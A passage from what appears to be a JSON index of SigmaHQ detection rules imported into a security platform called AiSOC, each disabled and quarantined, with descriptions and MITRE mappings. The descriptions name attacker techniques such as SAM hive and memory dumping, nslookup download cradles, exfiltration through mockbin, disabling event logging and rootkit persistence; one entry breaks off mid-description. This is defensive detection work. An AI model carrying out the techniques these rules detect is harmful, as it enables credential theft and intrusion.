"sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-clip-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml" } }, { "id": "sigmahq-sigma-1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "type": "detection", "name": "Ping Hex IP", "description": "Detects a ping command that uses a hex encoded IP address", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ping-hex-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ping_hex_ip.yml" } }, { "id": "sigmahq-sigma-1a1ed54a-2ba4-4221-94d5-01dee560d71e", "type": "detection", "name": "Renamed CreateDump Utility Execution", "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-createdump-utility-execution.yaml", "quarantine_reason": "imported rule; upstream query language not 
directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_createdump.yml" } }, { "id": "sigmahq-sigma-1a2d6c47-75b0-45bd-b133-2c0be75349fd", "type": "detection", "name": "Wdigest CredGuard Registry Modification", "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wdigest-credguard-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" } }, { "id": "sigmahq-sigma-1a2ea919-d11d-4d1e-8535-06cda13be20f", "type": "detection", "name": "Triple Cross eBPF Rootkit Default Persistence", "description": "Detects the creation of \"ebpfbackdoor\" files in both \"cron.d\" and \"sudoers.d\" directories. 
Which both are related to the TripleCross persistence method", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/triple-cross-ebpf-rootkit-default-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a2ea919-d11d-4d1e-8535-06cda13be20f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml" } }, { "id": "sigmahq-sigma-1a31b18a-f00c-4061-9900-f735b96c99fc", "type": "detection", "name": "Remote Access Tool Services Have Been Installed - System", "description": "Detects service installation of different remote access tools software. 
These tools are often abused by threat actors to establish remote access and persistence on compromised hosts
"rules/cloud/azure/identity_protection/azure_identity_protection_atypical_travel.yml" } }, { "id": "sigmahq-sigma-1a42dfa6-6cb2-4df9-9b48-295be477e835", "type": "detection", "name": "Vulnerable WinRing0 Driver Load", "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vulnerable-winring0-driver-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_vuln_winring0_driver.yml" } }, { "id": "sigmahq-sigma-1a4bd6af-99ac-4466-b5b2-7b72b4a05462", "type": "detection", "name": "Security Event Logging Disabled via MiniNt Registry Key - Process", "description": "Detects attempts to disable security event logging by adding the `MiniNt` registry key.\nThis key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications.\nAdversaries may want to disable this service to prevent logging of security events that could be used to detect their activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/security-event-logging-disabled-via-minint-registry-key-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a4bd6af-99ac-4466-b5b2-7b72b4a05462", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_event_logging_disable_via_key_minint.yml" } }, { "id": "sigmahq-sigma-1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "type": "detection", "name": "USB Device Plugged", "description": "Detects plugged/unplugged USB devices", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1200" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/usb-device-plugged.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a4bd6e3-4c6e-405d-a9a3-53a116e341d4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml" } }, { "id": "sigmahq-sigma-1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf", "type": "detection", "name": "Trust Access Disable For VBApplications", "description": "Detects registry changes to Microsoft Office \"AccessVBOM\" to a value of \"1\" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", 
"category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/trust-access-disable-for-vbapplications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml" } }, { "id": "sigmahq-sigma-1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "type": "detection", "name": "Firewall Rule Deleted Via Netsh.EXE", "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-rule-deleted-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_fw_delete_rule.yml" } }, { "id": "sigmahq-sigma-1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "type": "detection", "name": "PUA - Advanced IP/Port Scanner Update Check", "description": "Detect the update check performed by Advanced IP/Port 
Scanner utilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advanced-ip-port-scanner-update-check.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1a9bb21a-1bb5-42d7-aa05-3219c7c8f47d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_pua_advanced_ip_scanner_update_check.yml" } }, { "id": "sigmahq-sigma-1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "type": "detection", "name": "AWS EC2 Startup Shell Script Change", "description": "Detects changes to the EC2 instance startup script. 
The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-ec2-startup-shell-script-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ec2_startup_script_change.yml" } }, { "id": "sigmahq-sigma-1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "type": "detection", "name": "Winrar Compressing Dump Files", "description": "Detects execution of WinRAR in order to compress a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1560.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/winrar-compressing-dump-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_winrar_exfil_dmp_files.yml" } }, { "id": "sigmahq-sigma-1ac8666b-046f-4201-8aba-1951aaec03a3", "type": "detection", "name": "Command Line Execution with Suspicious URL and AppData Strings", "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003", "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/command-line-execution-with-suspicious-url-and-appdata-strings.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ac8666b-046f-4201-8aba-1951aaec03a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmd_http_appdata.yml" } }, { "id": "sigmahq-sigma-1ae64f96-72b6-48b3-ad3d-e71dff6c6398", "type": "detection", "name": "Suspicious External WebDAV Execution", "description": "Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1584", "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-external-webdav-execution.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1ae64f96-72b6-48b3-ad3d-e71dff6c6398", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_webdav_external_execution.yml" } }, { "id": "sigmahq-sigma-1af57a4b-460a-4738-9034-db68b880c665", "type": "detection", "name": "PowerShell SAM Copy", "description": "Detects suspicious PowerShell scripts accessing SAM hives", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-sam-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1af57a4b-460a-4738-9034-db68b880c665", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml" } }, { "id": "sigmahq-sigma-1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "type": "detection", "name": "Service Installation with Suspicious Folder Pattern", "description": "Detects service installation with suspicious folder patterns", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/service-installation-with-suspicious-folder-pattern.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml" } }, { "id": "sigmahq-sigma-1b3b01c7-84e9-4072-86e5-fc285a41ff23", "type": "detection", "name": "Nslookup PowerShell Download Cradle - ProcessCreation", "description": "Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/nslookup-powershell-download-cradle-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b3b01c7-84e9-4072-86e5-fc285a41ff23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_nslookup_poweshell_download.yml" } }, { "id": "sigmahq-sigma-1b45b0d1-773f-4f23-aedc-814b759563b1", "type": "detection", "name": "Application AppID Uri Configuration Changes", "description": "Detects when a configuration change is made to an applications AppID URI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1078.004" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-appid-uri-configuration-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b45b0d1-773f-4f23-aedc-814b759563b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_appid_uri_changes.yml" } }, { "id": "sigmahq-sigma-1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "type": "detection", "name": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-obfuscated-iex-invocation-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_obfuscated_iex.yml" } }, { "id": "sigmahq-sigma-1bac86ba-41aa-4f62-9d6b-405eac99b485", "type": "detection", "name": "Systemd Service Creation", "description": "Detects the creation of systemd 
services which could be used by adversaries to execute malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/systemd-service-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1bac86ba-41aa-4f62-9d6b-405eac99b485", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/path/lnx_auditd_systemd_service_creation.yml" } }, { "id": "sigmahq-sigma-1bbf25b9-8038-4154-a50b-118f2a32be27", "type": "detection", "name": "Suspicious Windows ANONYMOUS LOGON Local Account Created", "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as a covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1136.001", "T1136.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-windows-anonymous-logon-local-account-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1bbf25b9-8038-4154-a50b-118f2a32be27", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" } }, { "id": "sigmahq-sigma-1bc2e6c5-0885-472b-bed6-be5ea8eace55", "type": "detection", "name": "MacOS Scripting Interpreter AppleScript", "description": "Detects execution of AppleScript, the macOS scripting language.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/macos-scripting-interpreter-applescript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_applescript.yml" } }, { "id": 
"sigmahq-sigma-1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "type": "detection", "name": "Suspicious Modification Of Scheduled Tasks", "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-modification-of-scheduled-tasks.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_change.yml" } }, { "id": "sigmahq-sigma-1c12727d-02bf-45ff-a9f3-d49806a3cf43", "type": "detection", "name": "Renamed Plink Execution", "description": "Detects the execution of a renamed version of the Plink binary", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-plink-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"1c12727d-02bf-45ff-a9f3-d49806a3cf43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_plink.yml" } }, { "id": "sigmahq-sigma-1c3121ed-041b-4d97-a075-07f54f20fb4a", "type": "detection", "name": "Registry Explorer Policy Modification", "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-explorer-policy-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" } }, { "id": "sigmahq-sigma-1c480e10-7ee1-46d4-8ed2-85f9789e3ce4", "type": "detection", "name": "Group Policy Abuse for Privilege Addition", "description": "Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/group-policy-abuse-for-privilege-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c480e10-7ee1-46d4-8ed2-85f9789e3ce4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_group_policy_abuse_privilege_addition.yml" } }, { "id": "sigmahq-sigma-1c526788-0abe-4713-862f-b520da5e5316", "type": "detection", "name": "Chromium Browser Headless Execution To Mockbin Like Site", "description": "Detects the execution of a Chromium based browser process with the \"headless\" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/chromium-browser-headless-execution-to-mockbin-like-site.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c526788-0abe-4713-862f-b520da5e5316", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml" } }, { "id": "sigmahq-sigma-1c563233-030e-4a07-af8c-ee0490a66d3a", "type": "detection", "name": "Suspicious New-PSDrive to Admin Share", "description": "Adversaries may use New-PSDrive to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-new-psdrive-to-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c563233-030e-4a07-af8c-ee0490a66d3a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" } }, { "id": "sigmahq-sigma-1c67a717-32ba-409b-a45d-0fb704a73a81", "type": "detection", "name": "System Network Connections Discovery Via Net.EXE", "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-network-connections-discovery-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "1c67a717-32ba-409b-a45d-0fb704a73a81", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
